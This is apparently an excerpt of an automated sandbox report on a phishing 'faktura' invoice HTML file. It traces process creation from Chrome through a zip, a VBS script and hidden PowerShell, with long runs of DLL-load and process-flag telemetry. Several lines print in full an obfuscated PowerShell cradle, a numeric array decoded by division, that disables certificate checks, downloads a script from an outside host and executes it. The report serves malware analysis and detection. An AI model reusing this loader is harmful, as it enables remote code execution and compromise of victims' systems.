^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6068_386177336
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6068_386177336
Source: classification engine | Classification label: mal96.phis.expl.evad.winHTML@43/18@8/6
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\Downloads\dd874d12-8b59-4b0d-98a4-3b7b67550140.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exe | File created: C:\Users\user\AppData\Local\Temp\unarchiver.log
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\unarchiver.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
Source: C:\Windows\SysWOW64\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\unarchiver.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Windows\SysWOW64\7za.exe | Sections loaded: 7z.dll
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded: cmdext.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, gpapi.dll, msxml3.dll, wininet.dll, iertutil.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, dpapi.dll, ncrypt.dll, ncryptsslp.dll, mpr.dll, scrrun.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, uxtheme.dll, secur32.dll, sspicli.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Sections loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior

Data Obfuscation

Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^|%{[char]($_/4)})-join'') ^| ^&($uNteWVUN) "
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
